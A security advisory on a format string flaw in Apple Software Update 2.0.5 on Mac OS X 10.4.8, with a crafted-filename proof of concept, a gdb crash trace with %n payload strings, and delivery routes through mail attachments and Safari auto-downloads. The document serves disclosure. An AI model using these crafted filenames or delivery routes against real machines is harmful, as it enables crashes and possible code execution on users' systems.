Apple Software Update is used for delivering patches to end-users, such as the Apple Security Update 2007-001. It relies on the HTTP protocol for retrieving files associated with each available patch, and handles the application/x-apple.sucatalog+xml MIME type and the sucatalog and swutmp file extensions.

Software Update fails to properly handle the filename strings containing the swutmp extension. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.

See the 'Exploitation conditions' section for more information.

Affected versions

This issue has been verified with Apple Software Update Version 2.0.5 (2.0.5) on Mac OS X 10.4.8 (8L2127).

Proof of concept, exploit or instructions to reproduce

The following is the most simple way to demonstrate this issue:

$ touch %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
$ open %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp

See the 'Exploitation conditions' section for more information on different vectors to trigger the issue.

Debugging information

The following debugging information shows Software Update crashing when opening a file with a crafted filename:

(gdb) r
Starting program: /System/Library/CoreServices/Software
MacOS/Software Update 
Reading symbols for shared libraries ....... done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x9326aea3
0x9000c0c1 in __vfprintf ()
(gdb) i r
eax            0x9326aea3       -1826181469
ecx            0x0      0
edx            0x0      0
ebx            0x9000ad62       -1879003806
esp            0xbfffd600       0xbfffd600
ebp            0xbfffdd58       0xbfffdd58
esi            0xbfffed4e       -1073746610
edi            0x25     37
eip            0x9000c0c1       0x9000c0c1 <__vfprintf+4976>
eflags         0x10282  66178
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55
(gdb) back
#0  0x9000c0c1 in __vfprintf ()
#1  0x90100ea9 in snprintf_l ()
#2  0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3  0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4  0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5  0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6  0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7  0x934ac77a in _NXDoLocalRunAlertPanel ()
#8  0x93588ad6 in NSRunCriticalAlertPanel ()
#9  0x0000612a in ?? ()

(gdb) grep /s ThisIsEmbarrassing
Pattern found @ 0x1879433
0x1879433:       "ThisIsEmbarrassing%n%n%n%#629AE"
Pattern found @ 0x3b792b
0x3b792b:        "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp??????\005"
Pattern found @ 0x3b7c6b
0x3b7c6b:        "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmpssing%25`????\a\001"
Pattern found @ 0x3b7cc4
0x3b7cc4:        "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp"


Exploitation conditions

We are conducting further tests around Software Update and possible vectors to abuse this issue. So far, we have worked around via crafted attachment, 'pushing' Safari to download the file (which is downloaded at the user Desktop folder automatically, by sending it as the associated MIME type application/x-apple.sucatalog+xml) and obviously locally opening the file.

There are other potential methods to abuse it and thus this advisory might be updated whenever new details become available and tested.

Workaround or temporary solution

Wait for Apple to release a patch for Software Update via Software Update.

"Ah, #23 explains #22 a little. It almost seems like they're wording it so a crash could lead to a root shell in all cases." -- Someone who missed Sesame street's "We Learn Reading with Duckie".